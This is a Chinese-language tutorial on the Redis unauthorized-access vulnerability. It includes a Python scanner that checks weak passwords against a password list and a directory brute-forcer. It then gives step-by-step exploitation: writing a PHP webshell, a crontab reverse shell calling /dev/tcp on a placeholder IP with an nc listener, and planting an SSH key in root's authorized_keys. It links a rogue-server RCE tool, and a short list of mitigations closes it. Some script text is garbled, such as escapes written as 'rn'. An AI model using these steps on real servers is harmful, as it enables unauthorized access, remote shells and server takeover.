一文了解 Redis 未授权访问漏洞
前言
学习有名的 Redis 未授权访问漏洞
1、Redis 未授权访问漏洞
(1)原理
Redis默认情况下,会绑定0.0.0.0:6379
,如果没有采用相关的策略,比如添加防火墙规则表面其他非信任来源IP访问等,这样会将Redis服务暴露到公网上,如果在没有设置密码认证 (一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据
攻击者在未授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥 写入目标服务器的/root/.ssh
文件夹中authotrized_keys文件中,进而可以只用对应私钥直接使用ssh服务登录目标服务器。
(2)条件
- redis绑定在
0.0.0.0:6379
,且没有添加防火墙规则避免其他非信任来源IP访问等相关安全策略,直接暴露在公网 - 没有设置密码认证(一般为空),可以免密码远程登录redis服务
(3)漏洞危害
- 攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行
flushall
来清空所有数据 - 攻击者可通过
EVAL
执行lua代码,或通过数据备份功能往磁盘写入后门程序 - 最严重的情况,如果Redis以root身份与运行,黑客可以给root账户写入SSH公钥文件直接通过SSH登录受害服务器
2、探测脚本
(1)测试是否存在 Redis 未授权访问漏洞
代码语言:javascript复制#! /usr/bin/env python
# -*- encoding: utf-8 -*-
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):
try:
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send("INFOrn")
result = s.recv(1024)
if "redis_version" in result:
return u"未授权访问"
elif "Authentication" in result:
for pass_ in PASSWORD_DIC:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send("AUTH %srn" %(pass_))
result = s.recv(1024)
if ' OK' in result:
return u"存在弱口令,密码:%s" % (pass_)
except Exception, e:
pass
if __name__ == '__main__':
ip=sys.argv[1]
port=sys.argv[2]
print check(ip,port, timeout=10)
(2)web目录探测
代码语言:javascript复制#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# 脚本说明
# 此脚本用于测试 Rdies 未授权访问时,在没权限写ssh私钥和定时任务又不知道web绝对路径的情况下,进行WEB目录探测
import redis
r = redis.Redis(host='127.0.0.1', port=6379)
# r = redis.Redis(host='127.0.0.1', port=6379, password=123) #带密码认证
pathlist = []
rootPath = "/web/releases/" #开始爆破的根目录
try:
for dirs in open("E:\dirs.txt",'r',encoding='UTF-8'): #这里是自己的字典,注意字符编码,关键还是字典
# dirs = dirs.decode()
dirslist = dirs.strip("n")
path = "%s%s" % (rootPath,str(dirslist))
try:
checkDir = r.config_set("dir",path)
info = "当前路径: " str(path) "t" "存在!"
pathlist.append(info)
print(info)
except Exception as e:
if len(str(e)) == 45:
print("当前路径: " path "t" " 不存在!")
elif len(str(e)) == 37:
info = "当前路径: " path "t" "没权限!"
pathlist.append(str(info))
print(info)
else :
info = "当前路径: " path "t" str(e)
pathlist.append(str(info))
print(info)
except Exception as e:
print("如果编码错误请检查字典中是否有乱码,错误信息:" str(e))
print("===================== 探测完成 =====================")
for path_success in pathlist:
print(path_success)
3、利用过程
(1)写入webshell
条件:
- 知道web根目录绝对路径
- redis权限不是root,不过有web目录写权限
流程:
- 先确认存在redis未授权访问漏洞,并获取web根目录
- 连接redis服务端:
redis-cli.exe -h [ip] -p [port]
- 进入根目录:
config set dir [根目录绝对路径]
- 创建脚本文件:
config set dbfilename shell.php
- 写入命令:
set webshell "rnrn<?php phpinfo();?>rnrn"
- 保存:
save
访问shell.php即可
(2)在crontab里写定时任务反弹shell
条件:
- centos:redis向任务计划文件写内容会出现乱码,centos会忽略乱码
- 权限可写计划任务
流程:
- 监听端口:
nc -lvvp 8769
- 生成计划任务配置文件
config set dir /var/spool/cron
set x "nn*/l **** /bin/bash -i>&/dev/tcp/xxx.xxx.xxx.xxx/8769 0>&lnn"
config set dbfilename root
save
(3)写入ssh公钥,获取root权限
条件:
- 开启了秘钥认证的linux主机
- root权限你
- 开启了ssh秘钥登录,存在
/etc/.ssh
文件
流程:
- 生成秘钥:
ssh-keygen -t rsa
- 保存公钥:
(echo -e "nn"; cat id_rsa.pub; echo -e "nn") > key.txt
- 写入redis:
cat key.txt | redis-cli -h [ip] -x set crack
- 生成authorized_keys文件:
redis-cli -h [ip]
config set dir /root/.ssh
config set dbfilename authorized_keys
- 本地私钥连接:
ssh -i id_rsa root@[ip]
(4)自动RCE脚本
参见:https://github.com/n0b0dyCN/redis-rogue-server
4、防范措施
一些防范措施如下:
- 禁止一些高危命令(要重启redis生效)
- 以低权限运行redis(要重启redis生效)
- 为redis添加密码验证(要重启redis生效)
- 禁止外网访问redis(要重启redis生效)
- 修改默认端口
- 设置防火墙策略
结语
学习了下redis未授权访问漏洞
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。其团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。团队现有三十多位正式成员及若干预备人员,下属联合分队数支。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。